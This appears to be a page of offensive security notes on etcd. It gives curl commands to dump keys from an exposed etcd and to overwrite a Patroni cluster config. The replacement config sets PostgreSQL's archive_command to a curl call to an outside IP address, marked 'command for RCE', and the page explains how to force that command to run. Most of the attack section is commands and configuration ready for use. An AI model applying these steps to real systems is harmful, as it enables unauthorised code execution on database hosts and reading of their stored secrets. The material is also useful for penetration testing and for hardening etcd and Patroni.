Etcd

Check v2 api keys

curl -s localhost:2379/v2/keys/?recursive=true | jq

Check v3 api keys

curl -k http://127.0.0.1:2379/v3/kv/range -X POST -d '{"key": "AA==", "range_end": "AA=="}'

Update Patroni cluster config for RCE

Get config

curl -s http://localhost:2379/v2/keys/service/<CLUSTER_NAME>/config | jq

Update config

curl -s -X PUT http://localhost:2379/v2/keys/service/<CLUSTER_NAME>/config -d value="$(jq -c . config.json)" | jq

or with url encode

curl -X PUT http://localhost:2379/v2/keys/service/test-cluster/config --data-urlencode [email protected] | jq

config.json:

{
  "ttl": 30,
  "loop_wait": 10,
  "retry_timeout": 10,
  "maximum_lag_on_failover": 1048576,
  "postgresql": {
    "use_pg_rewind": true,
    "parameters": {
      "archive_command": "curl http://158.160.117.132:1337", // command for RCE
      "archive_mode": "always",
      "archive_timeout": "10", // period for command execution
      "max_connections": 550,
      "max_locks_per_transaction": 512,
      "max_worker_processes": 27
    }
  }
}

Archive command is needed to backup wal in postgres. Every time a certain amount of data is reached (can also be configured in the config) wal is archived by executing archive_command

the archive_command trigger requires 1) Generate enough traffic to write to the database

2) Trigger archive_timeout,

3) Execute the SELECT pg_switch_wal(); command, for force archives the wal

PreviousGrpc NextPatroni

Last updated 4 months ago